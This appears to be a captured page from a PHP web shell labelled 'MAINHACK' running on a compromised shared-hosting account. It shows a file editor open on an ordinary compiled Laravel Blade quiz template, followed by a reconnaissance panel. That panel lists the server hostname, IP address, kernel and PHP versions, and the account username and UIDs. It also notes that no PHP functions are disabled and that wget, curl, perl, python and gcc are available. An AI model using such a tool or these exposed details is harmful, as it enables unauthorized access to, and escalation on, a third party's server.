[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 72de146a50aa2d304b6d2a4d3fa8cc95eea0a4f4.php
<li data-id="<?php echo e(!empty($chapterItem) ? $chapterItem->id :''); ?>" class="accordion-row bg-white rounded-sm border border-gray300 mt-20 py-15 py-lg-30 px-10 px-lg-20"> <div class="d-flex align-items-center justify-content-between " role="tab" id="quiz_<?php echo e(!empty($quizInfo) ? $quizInfo->id :'record'); ?>"> <div class="d-flex align-items-center" href="#collapseQuiz<?php echo e(!empty($quizInfo) ? $quizInfo->id :'record'); ?>" aria-controls="collapseQuiz<?php echo e(!empty($quizInfo) ? $quizInfo->id :'record'); ?>" data-parent="#<?php echo e(!empty($chapter) ? 'chapterContentAccordion'.$chapter->id : 'quizzesAccordion'); ?>" role="button" data-toggle="collapse" aria-expanded="true"> <span class="chapter-icon chapter-content-icon mr-10"> <i data-feather="award" class=""></i> </span> <span class="font-weight-bold text-dark-blue d-block"><?php echo e(!empty($quizInfo) ? $quizInfo->title : trans('public.add_new_quizzes')); ?></span> </div> <div class="d-flex align-items-center"> <?php if(!empty($quizInfo) and $quizInfo->status != \App\Models\WebinarChapter::$chapterActive): ?> <span class="disabled-content-badge mr-10"><?php echo e(trans('public.disabled')); ?></span> <?php endif; ?> <?php if(!empty($quizInfo) and !empty($chapterItem)): ?> <button type="button" data-item-id="<?php echo e($quizInfo->id); ?>" data-item-type="<?php echo e(\App\Models\WebinarChapterItem::$chapterQuiz); ?>" data-chapter-id="<?php echo e(!empty($chapter) ? $chapter->id : ''); ?>" class="js-change-content-chapter btn btn-sm btn-transparent text-gray mr-10"> <i data-feather="grid" class="" height="20"></i> </button> <?php endif; ?> <?php if(!empty($chapter)): ?> <i data-feather="move" class="move-icon mr-10 cursor-pointer" height="20"></i> <?php endif; ?> <?php if(!empty($quizInfo)): ?> <a href="/panel/quizzes/<?php echo e($quizInfo->id); ?>/delete" class="delete-action btn btn-sm btn-transparent text-gray"> <i data-feather="trash-2" class="mr-10 cursor-pointer" height="20"></i> </a> <?php endif; ?> <i class="collapse-chevron-icon" data-feather="chevron-down" height="20" href="#collapseQuiz<?php echo e(!empty($quizInfo) ? $quizInfo->id :'record'); ?>" aria-controls="collapseQuiz<?php echo e(!empty($quizInfo) ? $quizInfo->id :'record'); ?>" data-parent="#quizzesAccordion" role="button" data-toggle="collapse" aria-expanded="true"></i> </div> </div> <div id="collapseQuiz<?php echo e(!empty($quizInfo) ? $quizInfo->id :'record'); ?>" aria-labelledby="quiz_<?php echo e(!empty($quizInfo) ? $quizInfo->id :'record'); ?>" class=" collapse <?php if(empty($quizInfo)): ?> show <?php endif; ?>" role="tabpanel"> <div class="panel-collapse text-gray"> <?php echo $__env->make('web.default.panel.quizzes.create_quiz_form', [ 'inWebinarPage' => true, 'selectedWebinar' => $webinar, 'quiz' => $quizInfo ?? null, 'quizQuestions' => !empty($quizInfo) ? $quizInfo->quizQuestions : [], 'chapters' => $webinar->chapters, 'webinarChapterPages' => !empty($webinarChapterPages) ] , \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> </div> </li> <?php /**PATH /home/aoneqssk/public_html/resources/views/web/default/panel/webinar/create_includes/accordions/quiz.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285